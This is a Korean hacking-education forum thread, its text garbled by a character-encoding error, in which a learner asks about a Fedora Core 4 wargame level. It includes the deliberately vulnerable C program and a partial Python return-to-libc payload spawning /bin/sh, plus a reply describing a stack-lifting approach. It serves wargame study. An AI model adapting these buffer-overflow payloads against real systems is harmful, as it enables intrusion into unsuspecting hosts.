·¹º§ ÇØÅ·

 2844, 1/143 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   vngkv123
   fedora core4 cruel Áú¹®

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=3361 [º¹»ç]


sfp¸¦ üũÇÏÁö ¾Ê´Â°É ÀÌ¿ëÇؼ­ Ç®·Á°í Çߴµ¥ ±Ã±ÝÇÑ°Ô À־ 2°¡Áö¸¸ Áú¹® µå·Áº¼°Ô¿ë .....

1. fedora core4ºÎÅÍ Æ¯Á¤ÇÔ¼öµéÀÌ esp¸¦ ±âÁØÀ¸·Î ÂüÁ¶ÇѴٴµ¥ ÇØ´çÇÔ¼öµéÀ» °üÂûÇغ¸´Ï ÀϹÝÀûÀ¸·Î gdb·Î º¸¸é esp¸¦ ±âÁØÀ¸·Î Àâ¾Æ¿À´Â°Í °°Àºµ¥ set disassembly-flavor intel·Î ¼³Á¤ÇÏ°í ”fÀ»½Ã¿£ ¿©ÀüÈ÷ ebp¸¦ ±âÁØÀ¸·Î ÀÎÀÚµéÀ» ÂüÁ¶Çß½À´Ï´Ù.
±×·¡¼­ °ø°ÝÀ» buf | dummy | sfp | ret | canary | temp stdin | Á¡À» ÀÌ¿ëÇÏ¿©
fake ebp¸¦ ÀÌ¿ëÇÏ¿©  temp stdin¿¡ ebp¸¦ µÎ°í execve(±×¸®°í system) + Dummy[4Byte] + &"/bin/sh"·Î ³Ö¾ú´Âµ¥ ÀüÇô ½ÇÇàÀÌ ¾ÈµÇ³×¿ä ¤Ð¤Ð ¶óÀÌÆ®¾÷¿¡´Â &"/bin/sh"ÀÌÈÄ¿¡ ´Ù¸¥ °ªµéÀ» ÁÖ´øµ¥ ¿Ö ±×·±Áö ÀÌÇظ¦ ¸øÇÏ°Ú³×¿ä ¤Ð

2. ´ñ±ÛÂÊ¿¡ ¼Ò½º¸¦ Âü°íÇҰǵ¥ ÀÌ ºÎºÐÀ» ¾î¶»°Ô üũÇϴ°ÇÁö Àß ¸ð¸£°Ú³×¿ë..
// preventing RTL
        ret = &canary - 1;
        if((*ret & 0xff000000) == 0)
        {
                printf("I've an allergy to NULL");
                exit(1);
        }


  Hit : 2590     Date : 2017/03/29 06:44



    
vngkv123 #include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

int vuln(int canary,char *ptr)
{
char buffer[256];
int *ret;

// stack overflow!!
strcpy(buffer,ptr);

// overflow protected
if(canary != 0x31337)
{
printf("who broke my canary?!");
exit(1);
}

// preventing RTL
ret = &canary - 1;
if((*ret & 0xff000000) == 0)
{
printf("I've an allergy to NULL");
exit(1);
}

// clearing attack buffer
memset(ptr, 0, 1024);

return 0;
}

int main()
{
char buffer[1024];

printf("enigma : The brothers will be glad to have you!\n");
printf("you : ");
fflush(stdout);

// give me a food!
fgets(buffer, 1024, stdin);

// oops~!
vuln(0x31337, buffer);

// bye bye
exit(0);
}
2017/03/29  
vngkv123 ÆÄÀ̽ã ÀͽºÄÚµå´Â ÀÌ·¸½À´Ï´Ù
import struct
import os
import socket
import time

p = lambda x : struct.pack("<L",x)

leaveret = 0x0804858e
canary = 0x31337
execve = 0x832abc
stdin = 0xb7f89000
system = 0x7db0e7
binsh = 0x8bd987


payload = "A"*260
payload += p(stdin + 0x110) + p(leaveret) + p(canary)
payload += p(stdin + 0x114)
payload += p(execve) + "A"*4 + p(binsh) + p(stdin + 0x11c) + p(0x0)
2017/03/29  
ÇØÄð·¯ ¾ÆÇÏ ¿À·¡ÀüÀ̶ó Àß ±â¾ïÀº ¾È³ªÁö¸¸ ¾Æ¸¶ fc4¿¡´Â Solar Designer°¡ Á¦¾ÈÇÑ ¾Æ½ºÅ°¾Æ¸Ó°¡ ¾ÆÁ÷ »ç¿ëµÇ´ø ½Ã±â¿´À» °Ì´Ï´Ù
±×·¡¼­ ¶óÀ̺귯¸® ÁÖ¼Ò¿¡ RTL ÀÎÀÚÀü´ÞÀ» ¸·±âÀ§ÇÑ null¹ÙÀÌÆ®°¡ ÃÖ»óÀ§¹ÙÀÌÆ®¿¡ Ç×»ó Á¸ÀçÇÏÁÒ

±×¸®°í Àç¹Õ´Â°Ç ÀÔ·ÂÀ» vuln¿¡¼­ ¹Þ´Â°Ô ¾Æ´Ï¶ó main¿¡¼­ ¹Þ¾Æ¼­ ³Ñ±â±â ¶§¹®¿¡
vulnÇÔ¼öÀÇ ¸®ÅϾîµå·¹½º ÀÌÈÄ·Î Ä«³ª¸®¿Í ¹öÆÛÁÖ¼Ò°¡ ÀÖ°í ¹Ù·Î ¹öÆÛÀÇ ÄÁÅÙÆ®°¡ À̾îÁý´Ï´Ù
°á±¹ Æä1À̷ε带 ret³Ê¸Ó 1024¹ÙÀÌÆ®¸¸Å­ ´õ ¾µ¼öµµÀÖ´Ü ¼Ò¸®ÁÒ
add esp °¡Á¬À» ÀÌ¿ëÇØ stack liftingÀ» Çϼż­ bufferÀÇ Ã¹½ÃÀÛÁîÀ½ºÎÅÍ RET SleddingÀ» Çϼż­ vulnÀÇ ¹öÆÛ¸¦ ¿À¹öÇÃ·Î¿ì ½Ãų¼ö ÀÖÀ»¸¸Å­ ret sleddingÀ» ÇϽŴÙÀ½¿¡ vulnÀÇ ¸®ÅÏÀÚ¸®¿¡´Â stack lifting + ret À» ³ÖÀ¸½Ã°í ±×´ÙÀ½¿¡ Ä«³ª¸®¸¦ ±âÁØÀ¸·Î vulnÀº strcpy¸¦ ¹«Á¶°Ç Á¾·áÇØ¾ß ÇÏ´Ï ±× ÀÌÈÄ¿¡ NULL¹ÙÀÌÆ®¸¦ Æ÷ÇÔÇÑ RTL Æä1À̷ε带 ³ÖÀ¸½Ã¸é µË´Ï´Ù
2017/03/30  
ÇØÄð·¯ ±×·¯´Ï±î ÀÔ·ÂÀº ÇϳªÁö¸¸ °ø°ÝÀÇ phase¸¦ µÎ´Ü°è·Î ³ª´²¼­ »ý°¢ÇÏ½Ã¸é µË´Ï´Ù 2017/03/30  
2844   hack the box vpn ¼³Ä¡°¡ ¾È µË´Ï´Ù[2]     jyk5350
07/16 1779
2843   ¿ö°ÔÀÓ¿¡¼­ ½ÇÁ¦ ÇÁ·ÎÁ§Æ®±îÁö À̾îÁö´Â °úÁ¤¿¡ °ü·ÃµÈ Áú¹®[2]     junhee329
04/28 1541
2842   ftz Á¢¼Ó °ü·Ã[1]     pk2861
04/01 1889
2841   level8ÀÇ ÈùÆ®ÆÄÀÏ ÈѼÕ[2]     MunHue
06/05 2148
2840   ·¹º§1ÀÇ /bin/bash ¸í·É¾î....     MunHue
05/15 2287
2839   ftz level4¿¡¼­ finger¸í·É¾î     krimson701
04/20 2401
2838   /bin/bash¿¡ °üÇؼ­[3]     MunHue
04/19 2487
2837   FC10 3¹ø ¹®Á¦ Áú¹®ÀÔ´Ï´Ù.[2]     tjdalstjr938
04/02 2498
2836   ftzÀÌ ¾ÈµÇ¿ä¤Ð¤Ð¤Ð¤Ð¤Ð[1]     ersd145
04/13 3155
  fedora core4 cruel Áú¹®[4]     vngkv123
03/29 2589
2834   Fedora core4...[3]     vngkv123
03/28 2591
2833   lob evil_wizard...[2]     vngkv123
03/27 2255
2832   lob gremlin....[1]     vngkv123
03/22 3620
2831   ftz level11 Áú¹®[1]     vngkv123
03/19 2342
2830   pwnable.kr passcode¹®Á¦ Áú¹®...[3]     vngkv123
03/14 2349
2829   ¿ö°ÔÀÓ Á¢ÇÒ ¼ö ÀÖ´Â »çÀÌÆ® ¾Ë·ÁÁÖ¼¼¿ä.[2]     ¿À¼Ò¸®
02/23 3876
2828   ¿ö°ÔÀÓ ±â¹Ý Áö½Ä¿¡ °üÇÑ Áú¹®[1]     salangi11
02/22 2245
2827   ftz Ç®±âÀ§ÇØ ÇÊ¿äÇÑ Áö½ÄÀÌ ±Ã±ÝÇÕ´Ï´Ù.[1]     read1516
01/13 2645
2826   Lob[1]     km1434
12/20 2430
2825   FTZ level4 ½© ¶ç¿ì´Â ¹®Á¦      kimstz0
10/09 2863
1 [2][3][4][5][6][7][8][9][10]..[143]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org